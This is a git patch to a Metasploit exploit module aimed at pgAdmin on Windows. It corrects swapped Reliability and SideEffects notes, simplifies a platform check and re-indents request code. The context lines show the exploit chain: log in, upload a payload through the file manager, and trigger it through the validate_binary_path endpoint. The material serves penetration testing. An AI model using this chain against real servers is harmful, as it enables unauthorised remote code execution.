From 2b7cf76fc85d67464603f6024ef337b9be9ee0af Mon Sep 17 00:00:00 2001 From: igomeow <10775605+igomeow@users.noreply.github.com> Date: Wed, 28 Aug 2024 18:20:20 +0200 Subject: [PATCH] Fixing wrong SideEffects and Reliability values --- .../windows/http/pgadmin_binary_path_api.rb | 85 ++++++++++--------- 1 file changed, 43 insertions(+), 42 deletions(-) diff --git a/modules/exploits/windows/http/pgadmin_binary_path_api.rb b/modules/exploits/windows/http/pgadmin_binary_path_api.rb index 24dddcb13c..12a0f39255 100644 --- a/modules/exploits/windows/http/pgadmin_binary_path_api.rb +++ b/modules/exploits/windows/http/pgadmin_binary_path_api.rb @@ -44,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ], - 'SideEffects' => [ REPEATABLE_SESSION, ] + 'Reliability' => [ REPEATABLE_SESSION, ], + 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] } ) ) @@ -96,8 +96,9 @@ class MetasploitModule < Msf::Exploit::Remote def on_windows? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) - if res&.code == 200 && platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first - return platform == 'win32' ? true : false + if res&.code == 200 + platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first + return platform == 'win32' end end @@ -139,17 +140,17 @@ class MetasploitModule < Msf::Exploit::Remote if auth_required? res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), - 'method' => 'POST', - 'keep_cookies' => true, - 'vars_post' => { - 'csrf_token' => csrf_token, - 'email' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'language' => 'en', - 'internal_button' => 'Login' - } - }) + 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), + 'method' => 'POST', + 'keep_cookies' => true, + 'vars_post' => { + 'csrf_token' => csrf_token, + 'email' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'language' => 'en', + 'internal_button' => 'Login' + } + }) unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') @@ -171,17 +172,17 @@ class MetasploitModule < Msf::Exploit::Remote def file_manager_init res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => 'application/json', - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => { - 'dialog_type' => 'storage_dialog', - 'supported_types' => ['sql', 'csv', 'json', '*'], - 'dialog_title' => 'Storage Manager' - }.to_json - }) + 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => 'application/json', + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => { + 'dialog_type' => 'storage_dialog', + 'supported_types' => ['sql', 'csv', 'json', '*'], + 'dialog_title' => 'Storage Manager' + }.to_json + }) unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir')) fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder') @@ -205,13 +206,13 @@ class MetasploitModule < Msf::Exploit::Remote form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => "multipart/form-data; boundary=#{form.bound}", - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => form.to_s - }) + 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => "multipart/form-data; boundary=#{form.bound}", + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => form.to_s + }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') end @@ -221,15 +222,15 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Payload uploaded to: #{upload_path}") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => 'application/json', - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => { - 'utility_path' => upload_path[0..upload_path.size - 16] - }.to_json - }) + 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => 'application/json', + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => { + 'utility_path' => upload_path[0..upload_path.size - 16] + }.to_json + }) true end